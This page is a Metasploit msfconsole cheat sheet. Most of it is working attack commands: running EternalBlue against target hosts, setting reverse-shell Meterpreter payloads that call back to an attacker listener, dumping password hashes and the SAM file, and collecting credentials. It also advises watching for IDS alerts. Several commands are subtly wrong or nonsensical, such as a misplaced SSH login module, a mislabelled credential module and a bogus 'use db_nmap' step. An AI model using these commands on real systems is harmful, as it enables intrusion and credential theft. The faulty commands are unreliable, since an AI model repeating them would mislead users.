Salta ai contenuti
1337skills 1337skills - Cheat Sheet

Msfconsole

Msfconsole is the primary interface to the Metasploit Framework. Develop, test, and execute exploits against target systems with payloads and post-exploitation modules.

Installation

Linux/Ubuntu

# Install Metasploit Framework
sudo apt update
sudo apt install metasploit-framework

# Or download directly
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/build/scripts/install.sh | bash

# Start service
sudo systemctl start postgresql
sudo msfdb init

# Verify
msfconsole -v

macOS

# Homebrew
brew tap mdisselbeck/metasploit
brew install metasploit

# Or manual download from Rapid7

Windows

# Download from:
# https://www.metasploit.com/download

# Run installer
# Or use WSL with Ubuntu installation

Basic Console Usage

Start Msfconsole

# Start with database
msfdb init
msfconsole

# Start with specific database
msfconsole --db postgres://user:pass@localhost/msf

# Start in quiet mode
msfconsole -q

# Start with resource script
msfconsole -r script.rc
# Show workspace
workspace

# Switch workspace
workspace -a testing
workspace testing

# List all modules
show exploits
show payloads
show auxiliary
show post
show encoders
show nops

# Search for modules
search ssh
search type:exploit platform:windows
search cve:2021-

# Show module info
info exploit/windows/smb/ms17_010_eternalblue

Exploitation Workflow

Basic Exploit Setup

# Use exploit
use exploit/windows/smb/ms17_010_eternalblue

# Show options
options
show options

# Set required options
set RHOSTS 192.168.1.0/24
set RHOST 192.168.1.100
set LHOST 192.168.1.10
set LPORT 4444

# Set payload
set PAYLOAD windows/meterpreter/reverse_tcp

# Show payload options
show payloads

# Run exploit
run
exploit

# Check if vulnerable
check

Common Exploits

# Windows SMB RCE
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
exploit

# SSH Brute Force
use exploit/ssh/ssh_login
set RHOSTS 192.168.1.100
set USERNAME root
set PASSWORD password
exploit

# Apache Struts RCE
use exploit/multi/http/struts2_rest_xstream
set RHOSTS 192.168.1.100
exploit

# WordPress Plugin Vulnerability
use exploit/unix/webapp/wp_plugin_upload
set RHOSTS 192.168.1.100
exploit

Payload Management

Meterpreter Payloads

# Windows reverse shell
set PAYLOAD windows/meterpreter/reverse_tcp

# Windows bind shell
set PAYLOAD windows/meterpreter/bind_tcp

# Linux reverse shell
set PAYLOAD linux/x86/meterpreter/reverse_tcp

# Mac OS reverse shell
set PAYLOAD osx/x86/shell_reverse_tcp

# Android shell
set PAYLOAD android/meterpreter/reverse_tcp

# PHP shell
set PAYLOAD php/meterpreter/reverse_tcp

# Python shell
set PAYLOAD python/meterpreter/reverse_tcp

Set Payload Options

# Set payload
set PAYLOAD windows/meterpreter/reverse_tcp

# Set LHOST (listening host)
set LHOST 192.168.1.10

# Set LPORT (listening port)
set LPORT 4444

# Show payload options
show options

# Multiple payloads
set payload_type windows/meterpreter/reverse_tcp

Post-Exploitation

Meterpreter Sessions

# List active sessions
sessions

# Interact with session
sessions -i 1

# Background session
background

# Kill session
sessions -k 1

# Show session info
sessions -i 1

Meterpreter Commands

# Shell access
shell

# Execute commands
cmd /c "whoami"
cmd /c "ipconfig /all"

# File operations
upload /tmp/file.txt C:\\
download C:\\Windows\\System32\\config\\SAM

# System info
sysinfo
getuid
getpid

# Process listing
ps
kill 1234

# Network info
ifconfig
netstat -an
arp -a

Post-Exploitation Modules

# Use post module
use post/windows/gather/hashdump

# Dump hashes
run post/windows/gather/hashdump

# Enumerate users
run post/windows/gather/enum_applications

# Get Chrome passwords
run post/windows/gather/credentials/credential_collector

# Gather network info
run post/windows/gather/arp_scanner

# Find files
run post/windows/search/search_dwm_cache

Handlers

Create Listener

# Use multi-handler
use exploit/multi/handler

# Set payload matching exploit
set PAYLOAD windows/meterpreter/reverse_tcp

# Set listening port
set LPORT 4444

# Run listener
run

# Run in background
run -j

# View background jobs
jobs -l
jobs -k 1

Handler Options

# Specific LHOST
set LHOST 0.0.0.0

# ExitOnSession
set ExitOnSession false

# Handler properties
show advanced

Database & Workspace

Database Management

# Initialize database
msfdb init

# Check database status
msfdb status

# Delete database
msfdb delete

# Interact with database
db_status
db_info

Workspaces

# List workspaces
workspace

# Create workspace
workspace -a mytest

# Switch workspace
workspace mytest

# Add notes
notes -a "Target: 192.168.1.100"

# View notes
notes

Host & Network Scanning

Scanning

# Nmap scan integration
db_nmap -sV 192.168.1.0/24

# View hosts
hosts

# View services
services

# Vulnerability scanner
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run

Auxiliary Modules

Common Auxiliary Modules

# Port scanner
use auxiliary/scanner/nmap/nmap
set RHOSTS 192.168.1.100

# Service scanner
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.100

# FTP scanner
use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.1.100

# SSH scanner
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 192.168.1.100

# Web enumeration
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.100

# VNC scanner
use auxiliary/scanner/vnc/vnc_login
set RHOSTS 192.168.1.100

Options Management

Setting & Viewing Options

# Set option
set RHOSTS 192.168.1.100
set LHOST 192.168.1.10
set LPORT 4444

# Unset option
unset RHOST

# Clear all options
unset all

# Save to variable
set payload_type shell

# Show options
options
show options
show advanced

Resource Scripts

Create Automation Script

# Create script
cat << EOF > exploit.rc
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set LHOST 192.168.1.10
set PAYLOAD windows/meterpreter/reverse_tcp
run
EOF

# Run script
msfconsole -r exploit.rc

Example Scripts

# Scan and exploit
use db_nmap
scan -sV 192.168.1.0/24

# Multi-exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS file:/tmp/hosts.txt
run

Tips & Tricks

Useful Commands

# Clear screen
cls
clear

# Show banner
banner

# Show history
history

# Set global options
setg LHOST 192.168.1.10
setg LPORT 4444

# Show global options
show global

Exploitation Tips

  • Always scan targets first
  • Know available exploits for target OS/version
  • Use appropriate payloads
  • Set up handlers before running exploits
  • Monitor for IDS/IPS alerts
  • Document all activities
  • Clean up artifacts post-exploitation

Common Workflows

Penetration Testing Workflow

# 1. Scan network
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run

# 2. Find vulnerable hosts
show services
search type:exploit platform:windows

# 3. Prepare exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/meterpreter/reverse_tcp

# 4. Setup handler
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
run -j

# 5. Execute exploit
exploit

# 6. Post-exploit
sessions -i 1
run post/windows/gather/hashdump

Last updated: 2025-03-30